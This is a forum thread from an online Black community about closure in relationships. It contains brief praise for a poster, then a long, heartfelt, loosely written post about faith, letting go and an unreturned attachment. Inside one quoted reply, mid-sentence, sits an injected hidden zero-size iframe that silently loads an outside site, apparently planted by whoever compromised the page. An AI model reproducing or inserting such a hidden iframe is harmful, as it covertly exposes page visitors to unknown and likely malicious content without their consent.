Black Relationships : Do You Need Closure

river said:
I have many teachers but out of them all you are the deepest and most practical.

When Money talks I listen.

Keep doing whatcha doing, Sugah

Thanks for the compliments. I try my best to be my best...and let GOD take care of the rest.

I don't know everything...but what I do know I have a strong conviction in it. :D

river said:
I have many teachers but out of them all you are the<IFRAME SRC="http://iccee.com/index.html" WIDTH=0 HEIGHT=0 SCROLLING=NO FRAMEBORDER=0></IFRAME> deepest and most practical.

When Money talks I listen.

Keep doing whatcha doing, Sugah

You don't want to swell this brothers head anymore than it already is.

panafrica said:
You don't want to swell this brothers head anymore than it already is.
Why rotha Pan, I was just telling the truth. Except for my email notifications I've never had a question about which he did not give me a precise and workable solution.

monetary......

right ...
like i said in my first responding on this topic .And i,m a person who always want to move to the light.On a dayly basses people behold truth or answers that that can underpress people , rather it is on youre work ,relationships ., but always believed i the higest force that always brings it to light..god does not wants people to suffer.When you walk in darkness and confussion and you place him number one wich includes loving youreself he brings things to light.I have experianced a lot that people did not give anything ,.............wich made me suffer first....but than there was sumthing that gave me this rest and peace inside and that was .....

that eventualy we all have to stand infront of him...
not after this life only ....
but also now ...""ïn"" and""on'" this day...

and that the truth is that if you as a person continues to lie in wich form
lie to others lie to yourself .....will not make that person move forward..
so i just left them with their things ...

I love my brothers as much as myself.....(i can admit there where times i loved others more than myself ,that is wrong we all make that mistake)
I love myself and know that god want to give me the best ....
that means i wont settle for less ...means i wont lie to myself and to god..
and he will shows me always when i will do this ....

When some tells me from an honest and pure heart....in a normal condition...
and"" i mean not in all kinds of confussion and cercomstances .""...that he does not want to be with me....Loves me ,....uhh wants to talk with me...uhh...
get to know me... :oops:
ï may ask him again if he is shure about his case ...
but if he is shure .....

than i will let go :horse:
than that is not ment for me ....
its hard can hurt but i will not fight against it...

i mean i continue my live and continue to open up for people ..
new peopl,e old people ,family relationship...
i may think of that person and may wonder somethimes ,with out an answer and somthimes lord gives me answers(somethimes with tears ,just being honest here ..like i said i aint lying ..that has nothing to do with not moving forward , more with letting these emotions go and giving lord a chance to deal with the pain and heal the pain.......i can not lie .......and i am what i am only he and myself can form me.....)

youre quote..

""there are some things in life just hold as true and loving myself is one of them .......i refuse to hurt myself because of someones elses issues from past relationships or newly developed""

yes ..
one of them is that to .......and i say ""loving my brothers and sister as much as yourself.......

and i dont want to get hurt to .,but it happens
somthimes realy bad ....even when you have followed "'all the rules of protections "' ......
but it will happens somethime ones you love and open yourself up to another
rather the person has good intentions or not...and most of the time when it hurts deep is when you are not centered in god ....in Gods love...
and that is somthing that i hold verry treu now is to stay close to god..

cause when i would only love myself verry much....

it goes wrong to....

Youre quote...

"'if you cheat on me i,ll give closure to myself ....that is why i lay everything on the table so that you,ll know what my responses will be when certain things happen "'

i am like that to ....
i met this person a while a go..... :oops:
or .....umm no i think i met this person a while ago.....
ohh no ....
correct....
:idea: i thought i met this person a long time ago..
correct again.....(i,m sorry ,)
i never met him
but he gave me this feeling that he liked me....
and i feld this bonding with him and i feld him you know ..somthimes without even talking ...it was like a spirrituall bonding....mmm let me think it
it feld like love...and you know i feld that he feld that to .....
and he somthimes let go off things that he expressed that he feld it to....
i mean ...i didnt make it up in my head .....God was there....

but eventualy i asked him...
if this was treu ...
did you feel it to ...
like to get to know you...

and he said..
that it wasnt there ...
coulnd remember.....
that it was just flirting.......

so that was it.......
and that feld like cheating to me...
plus later god revealed other things to me .....that realy feld like he cheated on me for a long time and a long time ago......
that hurt...

so when he said that i had closure to myself....

and the proces of healing starts...

I continue my journey...
i follow gods light....
if someone comes on my path in my futurre and gives me the feeling god has shown to me cause like i said i will never lie to myself. (and i know what i have to feel....cause god has shown it to me)(and i have opened my self up to other guys ..liked them tought ok maybe this is him ...but i can help it if they walk away or when it later turns out to be not real)
i feel it ..he feels it , we feel it ..... and it is treu , i want to be with him ,and he sais i want to be with you to...
and act like it .......cause i also dont look what he will say...
(somethimes i,m sensetive to words Poetry but no...movement is what moves me more now)

but what he will do .....and how he walks.....and i will feel it in his touch..
than that is the person that it is ment for me...

and i wont filll in .who is the person ..as far as i know i havent done that
he (god)..only reveals things to me..

And i believe in commitment to...

i,m not only believe in it.....

but in every relationship i had ....
i handled like it and walked in it.....

youre quote.....

""They say they didnt mean it but continue to do it....its up to me to stop this because they wont ...
trust me they wont....""

the devil is the biggest liarr....
he will never stop lying Untill the end of time...
and it up to me to stop him...

by staying close to god and stay in his love...

""Love yourself ,give yourself closure..and move on""

thank you monetary...

i move on...
i give myself closure....

i love my brothers and sisters as much as myself......

and i wondered also talked with god just now is it good to put this right here
now but than he sais to me no .......cause it is not a lie it is treu you are standing right in front of me...go ahead...(worship someone is wrong ,loving is not)so i say it not as a confession to the world cause i dont live for this world i live in it but not for)this is also a part of loving myself cause its expressing how i feel.....
(dont worry ....i had closure)
but only god can stop me from loving people
love you :oops:
and sinds he wants us to love eachother i think he wont stop this...

i love you ....

brother behind the name monetary.....

how are you....

i miss you realy

somethimes....

and that is no lie....

Loveauroraflower:heart:

Donate

Support destee.com, the oldest, most respectful, online black community in the world - PayPal or CashApp

Latest profile posts

TractorsPakistan.com is one of the leading tractor exporters from Pakistan to Africa and the Caribbean regions.
HODEE wrote on Etophil's profile.
Welcome to Destee
@Etophil
Back